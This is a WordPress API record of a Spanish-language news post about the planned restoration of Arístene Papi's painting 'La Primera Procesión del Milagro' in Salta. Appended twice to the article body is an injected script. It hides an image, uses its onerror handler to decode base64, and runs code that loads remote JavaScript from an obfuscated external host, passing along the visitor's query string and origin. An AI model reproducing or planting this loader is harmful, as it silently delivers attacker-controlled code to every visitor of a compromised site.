{"id":1482,"date":"2022-09-13T23:14:06","date_gmt":"2022-09-14T02:14:06","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1482"},"modified":"2025-08-14T00:35:30","modified_gmt":"2025-08-14T03:35:30","slug":"restauraran-la-valiosa-obra-la-primera-procesion-del-milagro-de-aristene-papi","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1482","title":{"rendered":"Restaurar\u00e1n la valiosa obra \u201cLa Primera Procesi\u00f3n del Milagro\u201d de Ar\u00edstene Papi"},"content":{"rendered":"\n<h4 class=\"has-white-color has-text-color has-background wp-block-heading\" style=\"background-color:#584306\"><em>La tarea estar\u00e1 a cargo del equipo del Programa de Conservaci\u00f3n y Restauraci\u00f3n de la Subsecretar\u00eda de Patrimonio Cultural. La obra pertenece a la Biblioteca Provincial Victorino de la Plaza.<\/em><\/h4>\n\n\n\n<p>Comienza la primera etapa del trabajo de restauraci\u00f3n de una obra de gran importancia art\u00edstica e hist\u00f3rica para Salta: \u201cLa Primera Procesi\u00f3n del Milagro\u201d de Ar\u00edstiene Papi.<\/p>\n\n\n\n<p>La tarea estar\u00e1 a cargo del equipo del Programa de Conservaci\u00f3n y Restauraci\u00f3n de la Subsecretar\u00eda de Patrimonio Cultural que dirige Gabriela Do\u00f1a, integrado por Mar\u00eda In\u00e9s Zoricich, &nbsp;\u00c1ngela Russo y Macarena Flores.<\/p>\n\n\n\n<p>La obra, realizada en \u00f3leo sobre tela, data de 1939 y pertenece a la Biblioteca Provincial Victorino de la Plaza.<\/p>\n\n\n\n<p>Gabriela Do\u00f1a explic\u00f3: \u201cSe trata de un nuevo desaf\u00edo de restauraci\u00f3n para el Programa, no solo por el valor hist\u00f3rico de la obra, sino tambi\u00e9n por su t\u00e9cnica de elaboraci\u00f3n y dimensiones\u201d.<\/p>\n\n\n\n<p>Actualmente, el cuadro se encuentra en estado cr\u00edtico debido a que presenta serios desprendimientos de capa pict\u00f3rica en toda la superficie, provocados por distintos tipos de craquelados. Asimismo, se observa: una alteraci\u00f3n crom\u00e1tica por repintes e intervenciones anteriores, roturas y deformaciones del soporte, suciedad, oxidaci\u00f3n y manchas del barniz, entre otras cosas.<\/p>\n\n\n\n<p>El proyecto completo de restauraci\u00f3n de esta obra constar\u00e1 de 5 etapas:<\/p>\n\n\n\n<p>1. &nbsp;Acondicionamiento del Taller de Restauraci\u00f3n para recibir el cuadro<\/p>\n\n\n\n<p>2. &nbsp;Investigaci\u00f3n de antecedentes sobre el bien patrimonial<\/p>\n\n\n\n<p>3. &nbsp;Embalaje y traslado de la obra al taller<\/p>\n\n\n\n<p>4. &nbsp;Historia Cl\u00ednica y Documentaci\u00f3n de la Obra<\/p>\n\n\n\n<p>5. &nbsp;Intervenci\u00f3n de Restauraci\u00f3n<\/p>\n\n\n\n<p>El Programa de Conservaci\u00f3n y Restauraci\u00f3n de la Subsecretaria de Patrimonio Cultural de la Secretar\u00eda de Cultura de la Provincia, es un referente en toda la Regi\u00f3n. Desde el 2000 viene implementando una pol\u00edtica de preservaci\u00f3n del patrimonio cultural de nuestra provincia, asesorando en el mismo tema a instituciones del Noroeste Argentino (Jujuy, Catamarca y Tucum\u00e1n), y procurando que las obras de las colecciones de los Museos y otras instituciones no sufran deterioros.<\/p>\n\n\n\n<p>Realiza, adem\u00e1s, una destacada tarea de recuperaci\u00f3n de la historia a trav\u00e9s de la conservaci\u00f3n y restauraci\u00f3n de obras pict\u00f3ricas de gran valor, entre las que se puede mencionar a \u201cLa Batalla de Salta\u201d y \u201cLa Muerte de G\u00fcemes\u201d.<\/p>\n\n\n\n<p>Ahora ser\u00e1 el turno de la obra de Papi, que nos remonta a los inicios de la historia de fe de un pueblo.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/restauraran-la-valiosa-obra-la-primera-procesion-del-milagro-de-aristene-papi-84858\" target=\"_blank\" rel=\"noreferrer noopener\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La tarea estar\u00e1 a cargo del equipo del Programa de Conservaci\u00f3n y Restauraci\u00f3n de la Subsecretar\u00eda de Patrimonio Cultural. La obra pertenece a la Biblioteca Provincial Victorino de la Plaza. Comienza la primera etapa del trabajo de restauraci\u00f3n de una obra de gran importancia art\u00edstica e hist\u00f3rica para Salta: \u201cLa Primera Procesi\u00f3n del Milagro\u201d de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1483,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-1482","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1482"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1482"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1482\/revisions"}],"predecessor-version":[{"id":7351,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1482\/revisions\/7351"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1483"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1482"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1482"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1482"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}